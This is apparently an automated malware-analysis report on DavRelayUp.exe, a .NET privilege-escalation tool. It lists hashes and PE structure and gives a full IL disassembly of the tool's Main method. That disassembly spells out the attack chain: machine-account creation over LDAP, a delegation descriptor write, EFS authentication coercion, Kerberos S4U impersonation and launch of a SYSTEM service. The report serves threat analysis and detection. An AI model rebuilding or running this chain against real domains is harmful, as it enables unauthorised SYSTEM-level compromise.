Suspicious
Suspect

0add16e3e96c888ca55a4566e04c000f

PE Executable | MD5: 0add16e3e96c888ca55a4566e04c000f | Size: 4.86 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash | Hash Value
MD5 | 0add16e3e96c888ca55a4566e04c000f
Sha1 | fd67dfbaf37099e17778f405c4db8ccf03b18325
Sha256 | ebd21ac4ac71e466c1441dd998895dc5f9567d3ca999a30762f6028dfc59b4d5
Sha384 | f0188744b36eea3350d636556747812b0624c89d5014c2b05139bb612a6c4fa9a72bb4acfc81d681a98fb45b269d2a02
Sha512 | 0b20d6419e8ccf8bc4d20d7336e539a613104e5768f64c321bd3d0316e46534050a138347c899f14509b7a621d7b4d9ea9e01ca4874be3ef938b1fc6f664d571
SSDeep | 49152:YqCFngKJITFDv6Vrb/TkvO90dL3BmAFd4A64nsfJQ2UnN05yOs88rQdzVezf6jI0:YHqKJGbRrNnAdhWELZkj4EQ0DLU
TLSH | 3D265B4FF89141B8C4AED634CAA59E527B31B884173123D72F71A6B62E33BD45EB8350

PeID

HQR data file
Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.data
.rdata
.pdata
.xdata
.bss
.edata
.idata
.CRT
.tls
.reloc
Information
Name | Value
Info | PE Detect: PeReader OK (file layout)
Info | PDB Path: H:\DavRelayUp-master\DavRelayUp-master\DavRelayUp\obj\Release\DavRelayUp.pdb
Module Name | DavRelayUp.exe
Full Name | DavRelayUp.exe
EntryPoint | System.Void DavRelayUp.Program::Main(System.String[])
Scope Name | DavRelayUp.exe
Scope Type | ModuleDef
Kind | Console
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | DavRelayUp
Assembly Version | 1.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | .NETFramework,Version=v4.7.2
Total Strings | 1043
Main Method | System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count | 672

Main IL

newobj System.Void DavRelayUp.Program/<>c__DisplayClass1_0::.ctor() stloc.0 <null> nop <null> ldstr DavRelayUp - Relaying you to SYSTEM, again... call System.Void System.Console::WriteLine(System.String) nop <null> ldarg.0 <null> call System.Boolean DavRelayUp.Options::ParseArgs(System.String[]) ldc.i4.0 <null> ceq <null> stloc.s V_13 ldloc.s V_13 brfalse.s IL_0026: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.0 <null> ceq <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_0051: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase nop <null> nop <null> ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) nop <null> nop <null> leave.s IL_004C: br IL_07B6 pop <null> nop <null> nop <null> leave.s IL_004C: br IL_07B6 br IL_07B6: ret ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> ceq <null> stloc.s V_15 ldloc.s V_15 brfalse.s IL_006B: call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> br IL_07B6: ret call System.Boolean DavRelayUp.WebClientEnabler::StartWebClientService() ldc.i4.0 <null> ceq <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_008A: ldstr "[+] WebClient Service started successfully" nop <null> ldstr [-] Failed to start WebClient Service call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret ldstr [+] WebClient Service started successfully call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_00AD: ldc.i4.1 ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) br.s IL_00AE: stloc.s V_17 
ldc.i4.1 <null> stloc.s V_17 ldloc.s V_17 brfalse.s IL_00C9: ldsfld System.String DavRelayUp.Options::domainController nop <null> call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldc.i4.0 <null> ceq <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_00C8: nop br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brfalse.s IL_010E: ldsfld System.String DavRelayUp.Options::domain nop <null> ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_20 ldloc.s V_20 brfalse.s IL_010D: nop nop <null> ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. 
call System.Void System.Console::WriteLine(System.String) nop <null> br IL_07B6: ret nop <null> ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) stloc.1 <null> ldloc.1 <null> newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.2 <null> ldloc.0 <null> ldstr {0}:{1} ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldsfld System.Boolean DavRelayUp.Options::useSSL stloc.s V_21 ldloc.s V_21 brfalse.s IL_0192: nop nop <null> ldloc.0 <null> ldstr ldaps:// ldloc.0 <null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) nop <null> nop <null> br.s IL_01C4: ldloc.2 nop <null> ldloc.0 <null> ldstr ldap:// ldloc.0 
<null> ldfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString call System.String System.String::Concat(System.String,System.String) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::ldapString ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) nop <null> ldloc.2 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) nop <null> nop <null> ldloc.2 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() nop <null> ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount stloc.s V_22 ldloc.s V_22 brfalse IL_03C7: ldloc.2 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_24 ldloc.s V_24 brfalse.s IL_01F6: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Program::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.s V_23 ldloc.s V_23 ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) nop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection 
System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . 
ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call 
System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> nop <null> ldloc.2 <null> ldloc.s V_23 callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) stloc.s V_25 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_03C6: nop stloc.s V_26 nop <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) nop <null> ldstr [-] ldloc.s V_26 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_07B6: ret nop <null> ldloc.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse 
DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectSID() stsfld System.String DavRelayUp.Options::rbcdComputerSid ldsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_28 ldloc.s V_28 brfalse.s IL_03FA: ldloc.2 br IL_07B6: ret ldloc.2 <null> call System.String System.Environment::get_MachineName() ldsfld System.String DavRelayUp.Options::domainDN call DavRelayUp.Program/LdapSearchComputerNameResponse DavRelayUp.Program::LdapSearchComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stloc.s V_27 ldloca.s V_27 call System.String DavRelayUp.Program/LdapSearchComputerNameResponse::get_ObjectDN() stsfld System.String DavRelayUp.Options::targetComputerDN ldsfld System.String DavRelayUp.Options::targetComputerDN call System.Boolean System.String::IsNullOrEmpty(System.String) stloc.s V_29 ldloc.s V_29 brfalse.s IL_042D: ldsfld System.String DavRelayUp.Options::targetComputerDN br IL_07B6: ret ldsfld System.String DavRelayUp.Options::targetComputerDN ldstr ldstr \20 callvirt System.String System.String::Replace(System.String,System.String) stsfld System.String DavRelayUp.Options::targetComputerDN ldstr O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;; ldsfld System.String DavRelayUp.Options::rbcdComputerSid ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stloc.3 <null> ldloc.3 <null> newobj System.Void System.Security.AccessControl.RawSecurityDescriptor::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Int32 System.Security.AccessControl.GenericSecurityDescriptor::get_BinaryLength() newarr System.Byte stloc.s V_5 ldloc.s V_4 ldloc.s V_5 ldc.i4.0 <null> callvirt System.Void 
System.Security.AccessControl.GenericSecurityDescriptor::GetBinaryForm(System.Byte[],System.Int32) nop <null> ldloc.0 <null> ldloc.s V_5 call System.String System.Convert::ToBase64String(System.Byte[]) stfld System.String DavRelayUp.Program/<>c__DisplayClass1_0::b64_sd ldloc.0 <null> ldftn System.Void DavRelayUp.Program/<>c__DisplayClass1_0::<Main>b__0() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) call System.Threading.Tasks.Task System.Threading.Tasks.Task::Run(System.Action) stloc.s V_6 ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Void DavRelayUp.KrbSCM::HookSecurityContext() nop <null> ldstr 127.0.0.1 call System.String System.Environment::get_MachineName() ldsfld System.Int32 DavRelayUp.Options::webdavServerPort ldc.i4.2 <null> call System.Void DavRelayUp.AuthTrigger.EfsTrigger::Trigger(System.String,System.String,System.Int32,DavRelayUp.AuthTrigger.EfsTrigger/ApiCall) nop <null> ldc.i4.1 <null> stsfld System.Boolean DavRelayUp.Options::triggerDone ldloc.s V_6 callvirt System.Void System.Threading.Tasks.Task::Wait() nop <null> ldnull <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_30 ldloc.s V_30 brfalse.s IL_054E: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash nop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . 
stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_31 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_9 ldc.i4.s 18 stloc.s V_8 nop <null> br.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_32 ldloc.s V_32 brfalse.s IL_056E: ldsfld System.String DavRelayUp.Options::rbcdComputerName nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_9 ldc.i4.s 23 stloc.s V_8 nop <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_9 ldloc.s V_8 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_33 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_33 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_10 ldloc.s V_10 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_11 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_34 ldloc.s V_34 brfalse.s IL_05FC: ldloc.s V_11 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String 
DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_11 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_35 ldloc.s V_35 brfalse.s IL_0697: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_12 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call 
System.Void System.Console::WriteLine(System.String) nop <null> ldloc.s V_11 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_12 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_36 ldloc.s V_36 brfalse.s IL_0712: ldc.i4 2500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.s V_7 call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) nop <null> ldc.i4 2500 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly stloc.s V_37 ldloc.s V_37 brfalse IL_07AE: nop nop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean 
System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_39 ldloc.s V_39 brfalse.s IL_0772: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_38 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_40 ldloc.s V_40 brfalse.s IL_079D: ldloc.s V_38 ldloc.s V_38 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_38 ldloc.s V_38 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.s V_7 call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> nop <null> br.s IL_07B6: ret nop <null> call System.Void DavRelayUp.KrbSCM::Run() nop <null> nop <null> ret <null>

Characteristics
No malware configuration was found at this point.